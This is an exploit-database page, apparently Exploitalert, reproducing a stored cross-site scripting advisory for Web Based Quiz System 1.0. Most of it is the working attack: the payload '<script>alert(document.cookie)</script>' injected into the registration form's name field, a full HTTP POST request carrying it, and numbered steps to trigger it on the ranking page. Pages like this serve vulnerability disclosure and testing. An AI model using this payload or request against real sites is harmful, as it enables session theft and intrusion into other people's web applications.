Advertisement






Web Based Quiz System 1.0 | Stored Cross-Site Scripting (XSS)

CVE Category Price Severity
CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-04-18
CPE
cpe:cpe:/a:web-based-quiz-system:1.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040106

Below is a copy:

Web Based Quiz System 1.0 | Stored Cross-Site Scripting (XSS)
|===========================================================================
| # Exploit Title :  Web Based Quiz System 1.0 | Stored Cross-Site Scripting (XSS)   
|                                                                           
| # Author : Ali Seddigh                                                    
|                                                                           
| # Category : Web Application
|
| # Software : Web Based Quiz System
|
| # Vendor Homepage: https://www.sourcecodester.com                                                                                                                                                                                                                                                       
|
| # Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html                              
|                                                                           
| # Tested on : [ Windows ~> 10]                                                     
|
| # Version: 1.0
|                  
| # Date : 2021-04-12                                                       
|===========================================================================

# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in registration form in name parameter affected from this vulnerability.
# payload: <script>alert(document.cookie)</script>

# HTTP POST request
POST http://localhost:8080/quiz/register.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
Content-Length: 690
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/quiz/register.php
Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
Upgrade-Insecure-Requests: 1

-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="name"

<script>alert(document.cookie)</script>
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="password"

Hacker
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="college"

hello
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="submit"


-----------------------------283640616528311462411171270636--

POC:
# Step 1 : go to url http://localhost:8080/quiz/register.php
# Step 2 : then you have to fill the above payload in name/username parameter
# Step 3 : then fill the remaining details
# Step 4 : then click submit
# Step 5 : then login to user account
# Step 6 : then attempt any one quiz after attempting go to ranking section then
# Step 7 : you can see xss pop up there..!

|===========================================================================
| # Discovered By : Ali Triplex                                             
|===========================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum